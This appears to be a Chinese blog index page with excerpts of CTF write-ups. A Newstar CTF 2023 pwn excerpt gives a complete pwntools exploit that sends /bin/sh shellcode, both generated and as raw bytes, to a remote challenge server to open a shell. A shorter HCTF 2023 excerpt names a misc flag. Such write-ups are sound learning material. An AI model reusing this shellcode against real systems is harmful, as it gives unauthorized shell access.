Newstar CTF 2023 pwn

1.ezshellcode 直接sendline(shellcode)即可 exp: from pwn import * p = remote("node4.buuoj.cn",29374) #p = process('/home/miyu/Desktop/ezshellcode') context(log_level = 'debug', arch = 'amd64', os = 'linux') shellcode=asm(shellcraft.sh()) #shellcode = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05' payload = shellcode p.sendlineafter('Show me your magic\n',payload) p.interactive() pwntools生成的shellcode和\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05都能过 ...

十月 17, 2023 · 2 分钟 · Mi Yu

HCTF 2023 wp

一、Misc 1.玩原神玩的 分析:附件为一张图片 观察最后一行,明显有flag的格式 搜索得知是 对照得flag为:hctf{yuanlainiyewanyuanshenhhh} ...

九月 12, 2023 · 6 分钟 · Mi Yu

PaperMod

Contains posts related to PaperMod

0 分钟 · Mi Yu